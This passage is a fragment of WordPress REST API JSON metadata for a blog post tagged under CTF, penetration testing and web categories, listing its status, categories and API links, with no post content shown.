[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-528","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/528","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=528"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/528\/revisions"}],"predecessor-version":[{"id":529,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/528\/revisions\/529"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=528"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=528"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=528"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}